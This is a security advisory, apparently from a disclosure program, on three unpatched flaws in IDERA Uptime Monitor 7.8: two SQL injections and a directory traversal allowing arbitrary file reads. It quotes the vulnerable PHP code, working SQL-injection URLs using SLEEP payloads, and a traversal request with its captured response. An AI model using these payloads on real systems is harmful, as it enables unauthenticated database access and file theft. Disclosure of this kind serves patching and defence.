1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269 | ## Vulnerabilities Summary
The following advisory describe three (3) vulnerabilities found in IDERA Uptime Monitor version 7.8.
“IDERA Uptime Monitor is a Proactively monitor physical servers, virtual machines, network devices, applications, and services across multiple platforms running on-premise, remotely, or in the Cloud. Uptime Infrastructure Monitor provides a unified view of IT environment health and a GUI that is easily customizable, with a drag-anddrop dashboard design. Create private IT dashboards, team dashboards (server, application, capacity and networking teams, and even the specialist practitioner such as SharePoint farm administrators, etc.), and a network operations center (NOC) for the entire datacenter in minutes.”
The vulnerabilities found are:
SQL Injection (1)
SQL Injection (2)
Directory Traversal and File Access
## Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
## Vendor response
We notified IDERA about the vulnerabilities back in March 2017, repeated attempts to re-establish contact and get some answers on the status of the patch for this vulnerabilities went unanswered. At this time there is no solution or workaround for this vulnerability.
CVE’s:
SQL Injection (1) – CVE-2017-11470
SQL Injection (2) – CVE-2017-11471
Directory Traversal and File Access – CVE-2017-11469
## Vulnerabilities Details
## SQL Injection (1)
IDERA Uptime Monitor 7.8 is affected by multiple SQL injection vulnerabilities. User controlled data is included in SQL queries made by the application without first being properly sanitized. As a result a remote unauthenticated user can inject arbitrary SQL queries into the application’s back-end database
The SQL injection vulnerability is located in “/gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php”:
```
if (isset($_GET['query_type'])) {
$query_type = $_GET['query_type'];
}
if (isset($_GET['uptime_offset'])) {
$offset = $_GET['uptime_offset'];
}
if (isset($_GET['time_frame'])) {
$time_frame = $_GET['time_frame'];
} else {
$time_frame = 3;
}
if (isset($_GET['metricType'])) {
$metricType = $_GET['metricType'];
}
if (isset($_GET['element'])) {
$vmware_object_id = $_GET['element'];
}
$json = array();
$oneElement = array();
$performanceData = array();
//date_default_timezone_set('UTC');
$db = new uptimeDB;
if ($db - & gt; connectDB()) {
echo "";
} else {
echo "unable to connect to DB exiting";
exit(1);
}
if ($query_type == "osperf-Mem") {
$min_mem_usage_array = array();
$max_mem_usage_array = array();
$avg_mem_usage_array = array();
$sql = "SELECT
e.entity_id,
e.display_name as NAME,
date(s.sample_time) as SAMPLE_TIME,
min(a.free_mem) as MIN_MEM_USAGE,
max(a.free_mem) as MAX_MEM_USAGE,
avg(a.free_mem) as AVG_MEM_USAGE,
min(c.memsize) as TOTAL_CAPACITY,
max(c.memsize),
avg(c.memsize),
day(s.sample_time),
month(s.sample_time),
year(s.sample_time)
FROM
performance_aggregate a, performance_sample s, entity e, entity_configuration c
WHERE
s.id = a.sample_id AND
s.uptimehost_id = e.entity_id AND
e.entity_id = c.entity_id AND
s.sample_time & gt;
date_sub(now(), interval ". $time_frame . "
month) AND
e.entity_id = $vmware_object_id
GROUP BY
e.entity_id,
year(s.sample_time),
month(s.sample_time),
day(s.sample_time)
```
User controlled data entering the HTTP GET parameter “element” is included as part of an SQL query that is executed if the “$query_type” variable is equal to “osperf-Mem”. Because the value of the “$query_type” variable can also be set using the HTTP GET parameter “query_type”, a user can force the application to take the vulnerable code path, and execute the tainted SQL query. Visiting the following URL on a vulnerable installation will trigger the vulnerability, and return a verbose SQL error message.
```
/gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php?query_type=osperfMem&element='
```
## Proof of Concept
```
http://192.168.199.129:9999/gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php?query_type=osperf-Mem&element=1%20AND%20SLEEP(5)
## SQL Injection (2)
IDERA Uptime Monitor 7.8 is affected by multiple SQL injection vulnerabilities. User controlled data is included in SQL queries made by the application without first being properly sanitized. As a result a remote unauthenticated user can inject arbitrary SQL queries into the application’s back-end database
The vulnerability is very similar in structure to the first SQL vulnerability, and is located in “/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php”
```
if (isset($_GET['query_type'])) {
$query_type = $_GET['query_type'];
}
if (isset($_GET['uptime_offset'])) {
$offset = $_GET['uptime_offset'];
}
if (isset($_GET['time_frame'])) {
$time_frame = $_GET['time_frame'];
} else {
$time_frame = 3;
}
if (isset($_GET['metricType'])) {
$metricType = $_GET['metricType'];
}
if (isset($_GET['element'])) {
$element_id = $_GET['element'];
}
$json = array();
$oneElement = array();
$performanceData = array();
//date_default_timezone_set('UTC');
$db = new uptimeDB;
if ($db - & gt; connectDB()) {
echo "";
} else {
echo "unable to connect to DB exiting";
exit(1);
}
if ($query_type == "xenserver-Mem") {
$min_mem_usage_array = array();
$max_mem_usage_array = array();
$avg_mem_usage_array = array();
$getXenServerMemUsedsql = "SELECT
e.entity_id,
e.display_name as NAME,
date(dd.sampletime) as SAMPLE_TIME,
min(dd.value) as MIN_MEM_USAGE,
max(dd.value) as MAX_MEM_USAGE,
avg(dd.value) as AVG_MEM_USAGE,
day(dd.sampletime),
month(dd.sampletime),
year(dd.sampletime)
FROM
erdc_base b, erdc_configuration c, erdc_parameter p,
erdc_decimal_data dd, erdc_instance i, entity e
WHERE
b.name = 'XenServer'
AND
b.erdc_base_id = c.erdc_base_id AND
b.erdc_base_id = p.erdc_base_id AND
p.name = 'hostMemUsed'
AND
p.erdc_parameter_id = dd.erdc_parameter_id AND
dd.erdc_instance_id = i.erdc_instance_id AND
dd.sampletime & gt;
date_sub(now(), interval ". $time_frame . "
month)
AND
i.entity_id = e.entity_id AND
e.entity_id = $element_id
GROUP BY
e.entity_id,
year(dd.sampletime),
month(dd.sampletime),
day(dd.sampletime)
";
```
Visiting the following URL will elicit a verbose SQL message from the vulnerable web application.
```
/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php?query_type=xenserver-Mem&time_frame=1&element='
```
## Proof of Concept
```
http://192.168.199.129:9999/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php?query_type=xenserverMem&time_frame=1&element=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))tayk)
```
## Directory Traversal and File Access
User controlled input is not sufficiently sanitized, and then passed to a function responsible for accessing the filesystem. Successful exploitation of this vulnerability enables a remote unauthenticated user to read the content of any file existing on the host, this includes files located outside of the web root folder.
The vulnerable code can be found in get2post.php file:
```
if(isset($_GET["file_name"]) && $_GET["file_name"] != null){
$fileName = $_GET["file_name"];
$data = file_get_contents($fileName);
$data = str_replace("\"", '"', $data);
unlink($fileName);
print("<input type=\"hidden\" name=\"script\" value=\"".$data."\">\n");
```
User controlled data entering the HTTP GET parameter “file_name” is sanitized by removing all occurrences of the “\” character, and is then passed to the “file_get_contents” function. Next, then contents of the file (now in the $data variable) is printed in the application’s HTTP response.
## Proof of Concept
The following HTTP GET request provides proof-of-concept that will retrieve the contents of a file named “test.txt” that exists in the root of “C:\”
```
GET
/wizards/get2post.php?file_name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5ctest.t
xt HTTP/1.1
Host: 192.168.199.129:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101
Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: PHPSESSID=8q7o2ckle9c6lcte045t7dufe2; cookieId=8q7o2ckle9c6lcte045t7dufe2
Connection: close
Upgrade-Insecure-Requests: 1
```
After executing this proof-of-concept against the vulnerable host, the following HTTP response was received containing the contents of the “test.txt” file that was placed in the root of “C:\”
```
HTTP/1.1 200 OK
Date: Mon, 06 Mar 2017 15:12:05 GMT
Server: Apache/2.4.20 (Win64) PHP/5.4.45 OpenSSL/1.0.2g
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 796
Connection: close
Content-Type: text/html
<html>
<head>
<title>Processing...</title>
</head>
<body onLoad="document.form.submit()">
<form name="form" action="../main.php?section=ERDCInstance&subsection=add"
method="post">
<input type="hidden" name="file_name" value="..\..\..\..\..\test.txt">
<input type="hidden" name="script"
value="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
<input type="hidden" name="category" value="agentless">
<input type="hidden" name="isWizard" value="1">
<input type="hidden" name="wizardPage" value="1">
<input type="hidden" name="wizardNumPages" value="2">
<input type="hidden" name="wizardTask" value="pageContinue">
<input type="hidden" name="visitedPage[1]" value="1">
<input type="hidden" name="fromGet2Post" value="true">
<img src="/images/InProgress.gif">
</form>
</body>
</html>
```
|